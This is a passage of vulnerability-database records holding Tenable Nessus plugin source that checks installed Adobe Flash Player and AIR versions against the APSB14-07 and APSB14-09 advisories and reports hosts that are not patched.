TRUE);\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:13", "description": "According to its version, the instance of Adobe AIR on the remote Mac OS X host is 4.0.0.1628 or earlier. It is, therefore, reportedly affected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross- site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Adobe AIR for Mac <= 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_13_0_0_83.NASL", "href": "https://www.tenable.com/plugins/nessus/73434", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73434);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Adobe AIR for Mac <= 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)\");\n script_summary(english:\"Checks version gathered by local check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Adobe AIR on the remote Mac\nOS X host is 4.0.0.1628 or earlier. It is, therefore, reportedly\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. (CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 13.0.0.83 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '4.0.0.1628';\nfixed_version_for_report = '13.0.0.83';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n\n # XSS\n set_kb_item(name:'www/0/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-08T14:09:55", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is equal or prior to 11.7.700.261 / 11.8.x / 11.9.x / 12.0.0.70. It is, therefore, potentially affected multiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in arbitrary code execution. (CVE-2014-0502)", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-07.NASL", "href": "https://www.tenable.com/plugins/nessus/72606", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72606);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n\n script_name(english:\"Flash Player <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on the\nremote Windows host is equal or prior to 11.7.700.261 / 11.8.x / 11.9.x\n/ 12.0.0.70. It is, therefore, potentially affected multiple\nvulnerabilities :\n\n - A stack overflow vulnerability exists that could result\n in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used\n to aid in buffer overflow attacks by bypassing address\n space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in\n arbitrary code execution. (CVE-2014-0502)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-14-040/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.269 / 12.0.0.70 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 12.0.0.44\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 12 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 44)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.261\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 261)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 && iver[1] == 8) ||\n # 11.9.x\n (iver[0] == 11 && iver[1] == 9) ||\n\n # 12.0.0.x <= 12.0.0.44\n (\n iver[0] == 12 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 44\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 12.0.0.70 (Chrome PepperFlash)';\n else\n {\n if (ver =~ \"^11\\.7\")\n fix = \"11.7.700.269\";\n else\n fix = \"12.0.0.70\";\n info += '\\n Fixed version : '+fix;\n }\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:31", "description": "Versions of Adobe Flash player prior to 11.7.700.275 / 13.0.0.182 are outdated and thus unpatched for the following vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n - A double free vulnerability exists that could result in arbitrary code execution. (CVE-2014-0502)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Flash Player < 11.7.700.269 / 12.0.0.70 Multiple Vulnerabilities (APSB14-07)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8807.PRM", "href": "https://www.tenable.com/plugins/nnm/8807", "sourceData": "Binary data 8807.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:28:09", "description": "Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n\n - APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh) updated.", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0277-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-157.NASL", "href": "https://www.tenable.com/plugins/nessus/75267", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-157.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75267);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0277-1)\");\n script_summary(english:\"Check for the openSUSE-2014-157 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n\n - APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=865021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-02/msg00069.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.341-2.60.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.341-2.60.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.341-2.60.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.341-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.341-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.341-34.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:37", "description": "The remote host is missing KB2929825. It is, therefore, affected by multiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in arbitrary code execution. (CVE-2014-0502)", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "MS KB2934802: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2934802.NASL", "href": "https://www.tenable.com/plugins/nessus/72608", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72608);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n script_xref(name:\"MSKB\", value:\"2934802\");\n\n script_name(english:\"MS KB2934802: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2929825. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result\n in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used\n to aid in buffer overflow attacks by bypassing address\n space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in\n arbitrary code execution. (CVE-2014-0502)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-14-040/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2934802/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2934802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ProductName\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 12.0.0.70\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 12 ||\n (\n iver[0] == 12 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 70)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.0.70\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-15T14:20:38", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal or prior to 11.7.700.261 / 11.8.x / 11.9.x / 12.0.0.44. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used to aid in buffer overflow attacks by bypassing address space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in arbitrary code execution. (CVE-2014-0502)", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_12_0_0_70.NASL", "href": "https://www.tenable.com/plugins/nessus/72607", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72607);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65702, 65703, 65704);\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.261 / 12.0.0.44 Multiple Vulnerabilities (APSB14-07) (Mac OS X)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.261 / 11.8.x /\n11.9.x / 12.0.0.44. It is, therefore, potentially affected by\nmultiple vulnerabilities :\n\n - A stack overflow vulnerability exists that could result\n in arbitrary code execution. (CVE-2014-0498)\n\n - A memory leak vulnerability exists that could be used\n to aid in buffer overflow attacks by bypassing address\n space layout randomization (ASLR). (CVE-2014-0499)\n\n - A double free vulnerability exists that could result in\n arbitrary code execution. (CVE-2014-0502)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-14-040/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.269 / 12.0.0.70 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.261\";\nextended_fixed_version = \"11.7.700.269\";\n\nstandard_cutoff_version = \"12.0.0.44\";\nstandard_fixed_version = \"12.0.0.70\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" 